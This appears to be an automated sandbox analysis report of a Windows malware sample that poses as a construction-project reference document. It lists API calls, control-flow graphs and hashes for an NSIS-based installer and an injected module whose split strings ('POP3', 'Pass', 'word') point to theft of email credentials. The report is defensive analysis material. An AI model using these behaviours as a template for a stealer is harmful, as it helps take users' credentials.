                                                                                                                          • Opcode Fuzzy Hash: a39a70bf23027790c6ceed37ac1eea17eaf571d42ba170f52e1d303d879162e8
                                                                                                                          • Instruction Fuzzy Hash: 92B13971900208BFDB219F60DD89AAE7B79FB04354F00813AFA05BA1A0C7759E52DF69
                                                                                                                          Function 00403CC2 Relevance: 58.1, APIs: 32, Strings: 1, Instructions: 345windowstringCOMMON
                                                                                                                          Download Yara Rule

                                                                                                                          Control-flow Graph

                                                                                                                          • Executed
                                                                                                                          • Not Executed
                                                                                                                          control_flow_graph 430 403cc2-403cd4 431 403e15-403e24 430->431 432 403cda-403ce0 430->432 434 403e73-403e88 431->434 435 403e26-403e6e GetDlgItem * 2 call 40419a SetClassLongW call 40140b 431->435 432->431 433 403ce6-403cef 432->433 438 403cf1-403cfe SetWindowPos 433->438 439 403d04-403d07 433->439 436 403ec8-403ecd call 4041e6 434->436 437 403e8a-403e8d 434->437 435->434 452 403ed2-403eed 436->452 442 403ec0-403ec2 437->442 443 403e8f-403e9a call 401389 437->443 438->439 445 403d21-403d27 439->445 446 403d09-403d1b ShowWindow 439->446 442->436 451 404167 442->451 443->442 465 403e9c-403ebb SendMessageW 443->465 448 403d43-403d46 445->448 449 403d29-403d3e DestroyWindow 445->449 446->445 456 403d48-403d54 SetWindowLongW 448->456 457 403d59-403d5f 448->457 455 404144-40414a 449->455 453 404169-404170 451->453 459 403ef6-403efc 452->459 460 403eef-403ef1 call 40140b 452->460 455->451 466 40414c-404152 455->466 456->453 463 403e02-403e10 call 404201 457->463 464 403d65-403d76 GetDlgItem 457->464 461 403f02-403f0d 459->461 462 404125-40413e DestroyWindow EndDialog 459->462 460->459 461->462 468 403f13-403f60 call 405fae call 40419a * 3 GetDlgItem 461->468 462->455 463->453 469 403d95-403d98 464->469 470 403d78-403d8f SendMessageW IsWindowEnabled 464->470 465->453 466->451 472 404154-40415d ShowWindow 466->472 500 403f62-403f67 468->500 501 403f6a-403fa6 ShowWindow EnableWindow call 4041bc EnableWindow 468->501 474 403d9a-403d9b 469->474 475 403d9d-403da0 469->475 470->451 470->469 472->451 478 403dcb-403dd0 call 404173 474->478 479 403da2-403da8 475->479 480 403dae-403db3 475->480 478->463 483 403de9-403dfc SendMessageW 479->483 484 403daa-403dac 479->484 480->483 485 403db5-403dbb 480->485 483->463 484->478 488 403dd2-403ddb call 40140b 485->488 489 403dbd-403dc3 call 40140b 485->489 488->463 498 403ddd-403de7 488->498 496 403dc9 489->496 496->478 498->496 500->501 504 403fa8-403fa9 501->504 505 403fab 501->505 506 403fad-403fdb GetSystemMenu EnableMenuItem SendMessageW 504->506 505->506 507 403ff0 506->507 508 403fdd-403fee SendMessageW 506->508 509 403ff6-404034 call 4041cf call 405f8c lstrlenW call 405fae SetWindowTextW call 401389 507->509 508->509 509->452 518 40403a-40403c 509->518 518->452 519 404042-404046 518->519 520 404065-404079 DestroyWindow 519->520 521 404048-40404e 519->521 520->455 522 40407f-4040ac CreateDialogParamW 520->522 521->451 523 404054-40405a 521->523 522->455 525 4040b2-404109 call 40419a GetDlgItem GetWindowRect ScreenToClient SetWindowPos call 401389 522->525 523->452 524 404060 523->524 524->451 525->451 530 40410b-404123 ShowWindow call 4041e6 525->530 530->455
                                                                                                                          APIs
                                                                                                                          • SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000013), ref: 00403CFE
                                                                                                                          • ShowWindow.USER32(?), ref: 00403D1B
                                                                                                                          • DestroyWindow.USER32 ref: 00403D2F
                                                                                                                          • SetWindowLongW.USER32(?,00000000,00000000), ref: 00403D4B
                                                                                                                          • GetDlgItem.USER32(?,?), ref: 00403D6C
                                                                                                                          • SendMessageW.USER32(00000000,000000F3,00000000,00000000), ref: 00403D80
                                                                                                                          • IsWindowEnabled.USER32(00000000), ref: 00403D87
                                                                                                                          • GetDlgItem.USER32(?,00000001), ref: 00403E35
                                                                                                                          • GetDlgItem.USER32(?,00000002), ref: 00403E3F
                                                                                                                          • SetClassLongW.USER32(?,000000F2,?), ref: 00403E59
                                                                                                                          • SendMessageW.USER32(0000040F,00000000,00000001,?), ref: 00403EAA
                                                                                                                          • GetDlgItem.USER32(?,00000003), ref: 00403F50
                                                                                                                          • ShowWindow.USER32(00000000,?), ref: 00403F71
                                                                                                                          • EnableWindow.USER32(?,?), ref: 00403F83
                                                                                                                          • EnableWindow.USER32(?,?), ref: 00403F9E
                                                                                                                          • GetSystemMenu.USER32(?,00000000,0000F060,00000001), ref: 00403FB4
                                                                                                                          • EnableMenuItem.USER32(00000000), ref: 00403FBB
                                                                                                                          • SendMessageW.USER32(?,?,00000000,00000001), ref: 00403FD3
                                                                                                                          • SendMessageW.USER32(?,00000401,00000002,00000000), ref: 00403FE6
                                                                                                                          • lstrlenW.KERNEL32(004226E8,?,004226E8,00428200), ref: 0040400F
                                                                                                                          • SetWindowTextW.USER32(?,004226E8), ref: 00404023
                                                                                                                          • ShowWindow.USER32(?,0000000A), ref: 00404157
                                                                                                                          Strings
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000004.00000002.2942513381.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                          • Associated: 00000004.00000002.2942494567.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000004.00000002.2942546434.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000004.00000002.2942567088.0000000000409000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000004.00000002.2942603725.000000000044A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_4_2_400000_Ref GEC409876 CONSTRUCTION OF MAJLIS PROJECT IN SAADIYAT, ABU DHABI.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: Window$Item$MessageSend$EnableShow$LongMenu$ClassDestroyEnabledSystemTextlstrlen
                                                                                                                          • String ID: &B
                                                                                                                          • API String ID: 184305955-3208460036
                                                                                                                          • Opcode ID: 079b4b4d5fd6d6117bac4e8a8c21c01d9b1a2f1f1a8a46ca874d55dbcaef2845
                                                                                                                          • Instruction ID: 96835d82c370a0a6a0181c3c86cda1860f3d4ae5ef3a20f552a9e9ef927ba2a4
                                                                                                                          • Opcode Fuzzy Hash: 079b4b4d5fd6d6117bac4e8a8c21c01d9b1a2f1f1a8a46ca874d55dbcaef2845
                                                                                                                          • Instruction Fuzzy Hash: DEC1B371A04200BBDB206F61ED49E3B3AA8FB95705F40093EF601B51F1C7799892DB2E
                                                                                                                          Function 0040391F Relevance: 42.2, APIs: 15, Strings: 9, Instructions: 216stringregistrylibraryCOMMON
                                                                                                                          Download Yara Rule

                                                                                                                          Control-flow Graph

                                                                                                                          • Executed
                                                                                                                          • Not Executed
                                                                                                                          control_flow_graph 533 40391f-403937 call 4062f6 536 403939-403949 call 405ed3 533->536 537 40394b-403982 call 405e59 533->537 545 4039a5-4039ce call 403bf5 call 405adf 536->545 541 403984-403995 call 405e59 537->541 542 40399a-4039a0 lstrcatW 537->542 541->542 542->545 551 403a60-403a68 call 405adf 545->551 552 4039d4-4039d9 545->552 558 403a76-403a9b LoadImageW 551->558 559 403a6a-403a71 call 405fae 551->559 552->551 553 4039df-403a07 call 405e59 552->553 553->551 562 403a09-403a0d 553->562 560 403b1c-403b24 call 40140b 558->560 561 403a9d-403acd RegisterClassW 558->561 559->558 576 403b26-403b29 560->576 577 403b2e-403b39 call 403bf5 560->577 564 403ad3-403b17 SystemParametersInfoW CreateWindowExW 561->564 565 403beb 561->565 567 403a1f-403a2b lstrlenW 562->567 568 403a0f-403a1c call 405a04 562->568 564->560 572 403bed-403bf4 565->572 569 403a53-403a5b call 4059d7 call 405f8c 567->569 570 403a2d-403a3b lstrcmpiW 567->570 568->567 569->551 570->569 575 403a3d-403a47 GetFileAttributesW 570->575 579 403a49-403a4b 575->579 580 403a4d-403a4e call 405a23 575->580 576->572 586 403bc2-403bca call 405307 577->586 587 403b3f-403b5c ShowWindow LoadLibraryW 577->587 579->569 579->580 580->569 594 403be4-403be6 call 40140b 586->594 595 403bcc-403bd2 586->595 589 403b65-403b77 GetClassInfoW 587->589 590 403b5e-403b63 LoadLibraryW 587->590 592 403b79-403b89 GetClassInfoW RegisterClassW 589->592 593 403b8f-403bc0 DialogBoxParamW call 40140b call 40386f 589->593 590->589 592->593 593->572 594->565 595->576 598 403bd8-403bdf call 40140b 595->598 598->576
                                                                                                                          APIs
                                                                                                                            • Part of subcall function 004062F6: GetModuleHandleA.KERNEL32(?,?,?,0040339D,00000009), ref: 00406308
                                                                                                                            • Part of subcall function 004062F6: LoadLibraryA.KERNEL32(?,?,?,0040339D,00000009), ref: 00406313
                                                                                                                            • Part of subcall function 004062F6: GetProcAddress.KERNEL32(00000000,?), ref: 00406324
                                                                                                                          • lstrcatW.KERNEL32(00436000,004226E8,80000001,Control Panel\Desktop\ResourceLocale,00000000,004226E8,00000000,00000002,00436800,74DF3420,00000000,00434000), ref: 004039A0
                                                                                                                          • lstrlenW.KERNEL32(004271A0,?,?,?,004271A0,00000000,00434800,00436000,004226E8,80000001,Control Panel\Desktop\ResourceLocale,00000000,004226E8,00000000,00000002,00436800), ref: 00403A20
                                                                                                                          • lstrcmpiW.KERNEL32(00427198,.exe,004271A0,?,?,?,004271A0,00000000,00434800,00436000,004226E8,80000001,Control Panel\Desktop\ResourceLocale,00000000,004226E8,00000000), ref: 00403A33
                                                                                                                          • GetFileAttributesW.KERNEL32(004271A0), ref: 00403A3E
                                                                                                                          • LoadImageW.USER32(00000067,00000001,00000000,00000000,00008040,00434800), ref: 00403A87
                                                                                                                            • Part of subcall function 00405ED3: wsprintfW.USER32 ref: 00405EE0
                                                                                                                          • RegisterClassW.USER32(004281A0), ref: 00403AC4
                                                                                                                          • SystemParametersInfoW.USER32(?,00000000,?,00000000), ref: 00403ADC
                                                                                                                          • CreateWindowExW.USER32(?,_Nb,00000000,80000000,?,?,?,?,00000000,00000000,00000000), ref: 00403B11
                                                                                                                          • ShowWindow.USER32(00000005,00000000), ref: 00403B47
                                                                                                                          • LoadLibraryW.KERNEL32(RichEd20), ref: 00403B58
                                                                                                                          • LoadLibraryW.KERNEL32(RichEd32), ref: 00403B63
                                                                                                                          • GetClassInfoW.USER32(00000000,RichEdit20W,004281A0), ref: 00403B73
                                                                                                                          • GetClassInfoW.USER32(00000000,RichEdit,004281A0), ref: 00403B80
                                                                                                                          • RegisterClassW.USER32(004281A0), ref: 00403B89
                                                                                                                          • DialogBoxParamW.USER32(?,00000000,00403CC2,00000000), ref: 00403BA8
                                                                                                                          Strings
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000004.00000002.2942513381.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                          • Associated: 00000004.00000002.2942494567.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000004.00000002.2942546434.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000004.00000002.2942567088.0000000000409000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000004.00000002.2942603725.000000000044A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_4_2_400000_Ref GEC409876 CONSTRUCTION OF MAJLIS PROJECT IN SAADIYAT, ABU DHABI.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: ClassLoad$InfoLibrary$RegisterWindow$AddressAttributesCreateDialogFileHandleImageModuleParamParametersProcShowSystemlstrcatlstrcmpilstrlenwsprintf
                                                                                                                          • String ID: .DEFAULT\Control Panel\International$.exe$Control Panel\Desktop\ResourceLocale$RichEd20$RichEd32$RichEdit$RichEdit20W$_Nb$&B
                                                                                                                          • API String ID: 914957316-1918744475
                                                                                                                          • Opcode ID: e933dc0526c884264ccc966e1026b46eff21a82c7d1415d0660c4e1366fcbd20
                                                                                                                          • Instruction ID: fe5ebf8e7a3d3daaf9cbba1b4cb9a1e73201f421c795aceacce4267b8607b26b
                                                                                                                          • Opcode Fuzzy Hash: e933dc0526c884264ccc966e1026b46eff21a82c7d1415d0660c4e1366fcbd20
                                                                                                                          • Instruction Fuzzy Hash: EB61A370644200BED720AF669C46F2B3A6CEB84749F40453FF945B62E2D7786902CA3E
                                                                                                                          Function 00404337 Relevance: 38.7, APIs: 20, Strings: 2, Instructions: 207windowstringCOMMON
                                                                                                                          Download Yara Rule

                                                                                                                          Control-flow Graph

                                                                                                                          • Executed
                                                                                                                          • Not Executed
                                                                                                                          control_flow_graph 604 404337-404349 605 404469-404476 604->605 606 40434f-404357 604->606 607 4044d3-4044d7 605->607 608 404478-404481 605->608 609 404359-404368 606->609 610 40436a-40438e 606->610 611 4045a5-4045ac 607->611 612 4044dd-4044f5 GetDlgItem 607->612 613 4045b4 608->613 614 404487-40448d 608->614 609->610 615 404390 610->615 616 404397-404412 call 40419a * 2 CheckDlgButton call 4041bc GetDlgItem call 4041cf SendMessageW 610->616 611->613 620 4045ae 611->620 617 404566-40456d 612->617 618 4044f7-4044fe 612->618 622 4045b7-4045be call 404201 613->622 614->613 619 404493-40449e 614->619 615->616 644 404414-404417 GetSysColor 616->644 645 40441d-404464 SendMessageW * 2 lstrlenW SendMessageW * 2 616->645 617->622 625 40456f-404576 617->625 618->617 624 404500-40451b 618->624 619->613 626 4044a4-4044ce GetDlgItem SendMessageW call 4041bc call 4045ca 619->626 620->613 629 4045c3-4045c7 622->629 624->617 630 40451d-404563 SendMessageW LoadCursorW SetCursor ShellExecuteW LoadCursorW SetCursor 624->630 625->622 631 404578-40457c 625->631 626->607 630->617 634 40458e-404592 631->634 635 40457e-40458c SendMessageW 631->635 638 4045a0-4045a3 634->638 639 404594-40459e SendMessageW 634->639 635->634 638->629 639->638 644->645 645->629
                                                                                                                          APIs
                                                                                                                          • CheckDlgButton.USER32(?,-0000040A,00000001), ref: 004043D5
                                                                                                                          • GetDlgItem.USER32(?,000003E8), ref: 004043E9
                                                                                                                          • SendMessageW.USER32(00000000,0000045B,00000001,00000000), ref: 00404406
                                                                                                                          • GetSysColor.USER32(?), ref: 00404417
                                                                                                                          • SendMessageW.USER32(00000000,00000443,00000000,?), ref: 00404425
                                                                                                                          • SendMessageW.USER32(00000000,00000445,00000000,04010000), ref: 00404433
                                                                                                                          • lstrlenW.KERNEL32(?), ref: 00404438
                                                                                                                          • SendMessageW.USER32(00000000,00000435,00000000,00000000), ref: 00404445
                                                                                                                          • SendMessageW.USER32(00000000,00000449,00000110,00000110), ref: 0040445A
                                                                                                                          • GetDlgItem.USER32(?,0000040A), ref: 004044B3
                                                                                                                          • SendMessageW.USER32(00000000), ref: 004044BA
                                                                                                                          • GetDlgItem.USER32(?,000003E8), ref: 004044E5
                                                                                                                          • SendMessageW.USER32(00000000,0000044B,00000000,00000201), ref: 00404528
                                                                                                                          • LoadCursorW.USER32(00000000,00007F02), ref: 00404536
                                                                                                                          • SetCursor.USER32(00000000), ref: 00404539
                                                                                                                          • ShellExecuteW.SHELL32(0000070B,open,004271A0,00000000,00000000,00000001), ref: 0040454E
                                                                                                                          • LoadCursorW.USER32(00000000,00007F00), ref: 0040455A
                                                                                                                          • SetCursor.USER32(00000000), ref: 0040455D
                                                                                                                          • SendMessageW.USER32(00000111,00000001,00000000), ref: 0040458C
                                                                                                                          • SendMessageW.USER32(?,00000000,00000000), ref: 0040459E
                                                                                                                          Strings
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000004.00000002.2942513381.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                          • Associated: 00000004.00000002.2942494567.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000004.00000002.2942546434.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000004.00000002.2942567088.0000000000409000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000004.00000002.2942603725.000000000044A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_4_2_400000_Ref GEC409876 CONSTRUCTION OF MAJLIS PROJECT IN SAADIYAT, ABU DHABI.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: MessageSend$Cursor$Item$Load$ButtonCheckColorExecuteShelllstrlen
                                                                                                                          • String ID: N$open
                                                                                                                          • API String ID: 3615053054-904208323
                                                                                                                          • Opcode ID: 3a3e15a46bcef9b8006e363d6ddaa5c0bc478510f2ba28bfd0355cb20498c547
                                                                                                                          • Instruction ID: ef3aff8114c15a744cba6b044a82d146c21238a9e490568bd42f4e53aa973cae
                                                                                                                          • Opcode Fuzzy Hash: 3a3e15a46bcef9b8006e363d6ddaa5c0bc478510f2ba28bfd0355cb20498c547
                                                                                                                          • Instruction Fuzzy Hash: CF718FB1A00209FFDB109F60DD85A6A7BA9FB94344F00853AFB01B62D1C778AD51CF99
                                                                                                                          Function 332B173A Relevance: 30.0, APIs: 5, Strings: 12, Instructions: 210COMMON
                                                                                                                          Download Yara Rule

                                                                                                                          Control-flow Graph

                                                                                                                          • Executed
                                                                                                                          • Not Executed
                                                                                                                          control_flow_graph 646 332b173a-332b17fe call 332bc030 call 332b2c40 * 2 653 332b1803 call 332b1cca 646->653 654 332b1808-332b180c 653->654 655 332b19ad-332b19b1 654->655 656 332b1812-332b1816 654->656 656->655 657 332b181c-332b1837 call 332b1ede 656->657 660 332b199f-332b19ac call 332b1ee7 * 2 657->660 661 332b183d-332b1845 657->661 660->655 663 332b184b-332b184e 661->663 664 332b1982-332b1985 661->664 663->664 668 332b1854-332b1881 call 332b44b0 * 2 call 332b1db7 663->668 666 332b1987 664->666 667 332b1995-332b1999 664->667 670 332b198a-332b198d call 332b2c40 666->670 667->660 667->661 680 332b193d-332b1943 668->680 681 332b1887-332b189f call 332b44b0 call 332b1db7 668->681 676 332b1992 670->676 676->667 683 332b197e-332b1980 680->683 684 332b1945-332b1947 680->684 681->680 697 332b18a5-332b18a8 681->697 683->670 684->683 685 332b1949-332b194b 684->685 687 332b194d-332b194f 685->687 688 332b1961-332b197c call 332b16aa 685->688 690 332b1951-332b1953 687->690 691 332b1955-332b1957 687->691 688->676 690->688 690->691 694 332b1959-332b195b 691->694 695 332b195d-332b195f 691->695 694->688 694->695 695->683 695->688 698 332b18aa-332b18c2 call 332b44b0 call 332b1db7 697->698 699 332b18c4-332b18dc call 332b44b0 call 332b1db7 697->699 698->699 708 332b18e2-332b193b call 332b16aa call 332b15da call 332b2c40 * 2 698->708 699->667 699->708 708->667
                                                                                                                          APIs
                                                                                                                            • Part of subcall function 332B1CCA: CopyFileW.KERNEL32(?,?,00000000,?,?,?,?,?,?,00000000), ref: 332B1D1B
                                                                                                                            • Part of subcall function 332B1CCA: CreateFileW.KERNEL32(?,80000000,00000000,00000000,00000003,?,00000000,?,?,00000000), ref: 332B1D37
                                                                                                                            • Part of subcall function 332B1CCA: DeleteFileW.KERNEL32(?,?,?,00000000,?,?,?,?,?,?,00000000), ref: 332B1D4B
                                                                                                                          • _strlen.LIBCMT ref: 332B1855
                                                                                                                          • _strlen.LIBCMT ref: 332B1869
                                                                                                                          • _strlen.LIBCMT ref: 332B188B
                                                                                                                          • _strlen.LIBCMT ref: 332B18AE
                                                                                                                          • _strlen.LIBCMT ref: 332B18C8
                                                                                                                          Strings
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000004.00000002.2967656105.00000000332B1000.00000040.00001000.00020000.00000000.sdmp, Offset: 332B0000, based on PE: true
                                                                                                                          • Associated: 00000004.00000002.2967631198.00000000332B0000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                          • Associated: 00000004.00000002.2967656105.00000000332C6000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_4_2_332b0000_Ref GEC409876 CONSTRUCTION OF MAJLIS PROJECT IN SAADIYAT, ABU DHABI.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: _strlen$File$CopyCreateDelete
                                                                                                                          • String ID: Acco$Acco$POP3$POP3$Pass$Pass$t$t$un$un$word$word
                                                                                                                          • API String ID: 3296212668-3023110444
                                                                                                                          • Opcode ID: 6f2763eb29f99e55b9fa1c4501e1124463a6139b8cfee53aa49ae728a3ea04e1
                                                                                                                          • Instruction ID: a377ff62a151fb489dade32b316294bd179e8fec8b96ae9691c35d4a488b5bc0
                                                                                                                          • Opcode Fuzzy Hash: 6f2763eb29f99e55b9fa1c4501e1124463a6139b8cfee53aa49ae728a3ea04e1
                                                                                                                          • Instruction Fuzzy Hash: EC613475D00759AFEF11CBA4D880BDEB7B9AF05380F444096D106B7290EBB47AC6CB92
                                                                                                                          Function 332B19B2 Relevance: 26.5, APIs: 11, Strings: 4, Instructions: 218COMMON
                                                                                                                          Download Yara Rule

                                                                                                                          Control-flow Graph

                                                                                                                          APIs
                                                                                                                          Strings
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000004.00000002.2967656105.00000000332B1000.00000040.00001000.00020000.00000000.sdmp, Offset: 332B0000, based on PE: true
                                                                                                                          • Associated: 00000004.00000002.2967631198.00000000332B0000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                          • Associated: 00000004.00000002.2967656105.00000000332C6000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_4_2_332b0000_Ref GEC409876 CONSTRUCTION OF MAJLIS PROJECT IN SAADIYAT, ABU DHABI.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: _strlen
                                                                                                                          • String ID: %m$~$Gon~$~F@7$~dra
                                                                                                                          • API String ID: 4218353326-230879103
                                                                                                                          • Opcode ID: 5313ffee17f5d615fcbb67a61029f9413697531bcd3fb870ba25ca75e457194f
                                                                                                                          • Instruction ID: cf3655be8c76a0ec4279c2887bf51dd3e6484c22adc15579b5552ec15c9a976c
                                                                                                                          • Opcode Fuzzy Hash: 5313ffee17f5d615fcbb67a61029f9413697531bcd3fb870ba25ca75e457194f
                                                                                                                          • Instruction Fuzzy Hash: E671F4B6D003296BDF119BB49CD4ADF7BFCAF09280F544096D544E7241EAB4A7C9CBA0
                                                                                                                          Function 00405CAA Relevance: 26.4, APIs: 12, Strings: 3, Instructions: 136stringmemoryfileCOMMON
                                                                                                                          Download Yara Rule

                                                                                                                          Control-flow Graph

                                                                                                                          • Executed
                                                                                                                          • Not Executed
                                                                                                                          control_flow_graph 786 405caa-405cd1 lstrcpyW 787 405cd3-405ceb call 405bf8 CloseHandle GetShortPathNameW 786->787 788 405cf9-405d08 GetShortPathNameW 786->788 790 405e20-405e25 787->790 794 405cf1-405cf3 787->794 788->790 791 405d0e-405d10 788->791 791->790 793 405d16-405d54 wsprintfA call 405fae call 405bf8 791->793 793->790 799 405d5a-405d76 GetFileSize GlobalAlloc 793->799 794->788 794->790 800 405e19-405e1a CloseHandle 799->800 801 405d7c-405d86 call 405c7b 799->801 800->790 801->800 804 405d8c-405d99 call 405b5d 801->804 807 405d9b-405dad lstrcpyA 804->807 808 405daf-405dc1 call 405b5d 804->808 809 405de4 807->809 814 405de0 808->814 815 405dc3-405dc9 808->815 811 405de6-405e13 call 405bb3 SetFilePointer WriteFile GlobalFree 809->811 811->800 814->809 817 405dd1-405dd3 815->817 818 405dd5-405dde 817->818 819 405dcb-405dd0 817->819 818->811 819->817
                                                                                                                          APIs
                                                                                                                          • lstrcpyW.KERNEL32(00425D88,NUL,?,00000000,?,?,?,00405E4E,?,?,00000001,004059C6,?,00000000,000000F1,?), ref: 00405CBA
                                                                                                                          • CloseHandle.KERNEL32(00000000,00000000,00000000,00000001,?,?,?,00405E4E,?,?,00000001,004059C6,?,00000000,000000F1,?), ref: 00405CDE
                                                                                                                          • GetShortPathNameW.KERNEL32(00000000,00425D88,00000400), ref: 00405CE7
                                                                                                                            • Part of subcall function 00405B5D: lstrlenA.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,00405D97,00000000,[Rename],00000000,00000000,00000000), ref: 00405B6D
                                                                                                                            • Part of subcall function 00405B5D: lstrlenA.KERNEL32(00405D97,?,00000000,00405D97,00000000,[Rename],00000000,00000000,00000000), ref: 00405B9F
                                                                                                                          • GetShortPathNameW.KERNEL32(?,00426588,00000400), ref: 00405D04
                                                                                                                          • wsprintfA.USER32 ref: 00405D22
                                                                                                                          • GetFileSize.KERNEL32(00000000,00000000,00426588,C0000000,?,00426588,?,?,?,?,?), ref: 00405D5D
                                                                                                                          • GlobalAlloc.KERNEL32(?,0000000A), ref: 00405D6C
                                                                                                                          • lstrcpyA.KERNEL32(00000000,[Rename],00000000,[Rename],00000000,00000000,00000000), ref: 00405DA4
                                                                                                                          • SetFilePointer.KERNEL32(?,00000000,00000000,00000000,00000000,00425988,00000000,-0000000A,00409560,00000000,[Rename],00000000,00000000,00000000), ref: 00405DFA
                                                                                                                          • WriteFile.KERNEL32(?,00000000,00000000,?,00000000), ref: 00405E0C
                                                                                                                          • GlobalFree.KERNEL32(00000000), ref: 00405E13
                                                                                                                          • CloseHandle.KERNEL32(00000000), ref: 00405E1A
                                                                                                                            • Part of subcall function 00405BF8: GetFileAttributesW.KERNEL32(00000003,00402DFF,00437800,80000000,00000003), ref: 00405BFC
                                                                                                                            • Part of subcall function 00405BF8: CreateFileW.KERNEL32(?,?,00000001,00000000,?,00000001,00000000), ref: 00405C1E
                                                                                                                          Strings
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000004.00000002.2942513381.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                          • Associated: 00000004.00000002.2942494567.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000004.00000002.2942546434.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000004.00000002.2942567088.0000000000409000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000004.00000002.2942603725.000000000044A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_4_2_400000_Ref GEC409876 CONSTRUCTION OF MAJLIS PROJECT IN SAADIYAT, ABU DHABI.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: File$CloseGlobalHandleNamePathShortlstrcpylstrlen$AllocAttributesCreateFreePointerSizeWritewsprintf
                                                                                                                          • String ID: %ls=%ls$NUL$[Rename]
                                                                                                                          • API String ID: 1265525490-899692902
                                                                                                                          • Opcode ID: 4ec48ef19e877a87b4e550a8e1bcde9517342a2eb5b98d96a27769bbdfe06ad2
                                                                                                                          • Instruction ID: 278018eb507e55e18bba05fe136388c5c8d345875c3a2ef582da275f9efe5ed0
                                                                                                                          • Opcode Fuzzy Hash: 4ec48ef19e877a87b4e550a8e1bcde9517342a2eb5b98d96a27769bbdfe06ad2
                                                                                                                          • Instruction Fuzzy Hash: 4C410F71604B19BFD2206B61AC4DF6B3A6CDF45754F14053BB901F62C2EA38A9018ABD
                                                                                                                          Function 00401000 Relevance: 26.4, APIs: 14, Strings: 1, Instructions: 125COMMON
                                                                                                                          Download Yara Rule
                                                                                                                          APIs
                                                                                                                          • DefWindowProcW.USER32(?,00000046,?,?), ref: 0040102C
                                                                                                                          • BeginPaint.USER32(?,?), ref: 00401047
                                                                                                                          • GetClientRect.USER32(?,?), ref: 0040105B
                                                                                                                          • CreateBrushIndirect.GDI32(00000000), ref: 004010CF
                                                                                                                          • FillRect.USER32(00000000,?,00000000), ref: 004010E4
                                                                                                                          • DeleteObject.GDI32(?), ref: 004010ED
                                                                                                                          • CreateFontIndirectW.GDI32(?), ref: 00401105
                                                                                                                          • SetBkMode.GDI32(00000000,00000001), ref: 00401126
                                                                                                                          • SetTextColor.GDI32(00000000,000000FF), ref: 00401130
                                                                                                                          • SelectObject.GDI32(00000000,?), ref: 00401140
                                                                                                                          • DrawTextW.USER32(00000000,00428200,000000FF,00000010,00000820), ref: 00401156
                                                                                                                          • SelectObject.GDI32(00000000,00000000), ref: 00401160
                                                                                                                          • DeleteObject.GDI32(?), ref: 00401165
                                                                                                                          • EndPaint.USER32(?,?), ref: 0040116E
                                                                                                                          Strings
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000004.00000002.2942513381.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                          • Associated: 00000004.00000002.2942494567.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000004.00000002.2942546434.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000004.00000002.2942567088.0000000000409000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000004.00000002.2942603725.000000000044A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_4_2_400000_Ref GEC409876 CONSTRUCTION OF MAJLIS PROJECT IN SAADIYAT, ABU DHABI.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: Object$CreateDeleteIndirectPaintRectSelectText$BeginBrushClientColorDrawFillFontModeProcWindow
                                                                                                                          • String ID: F
                                                                                                                          • API String ID: 941294808-1304234792
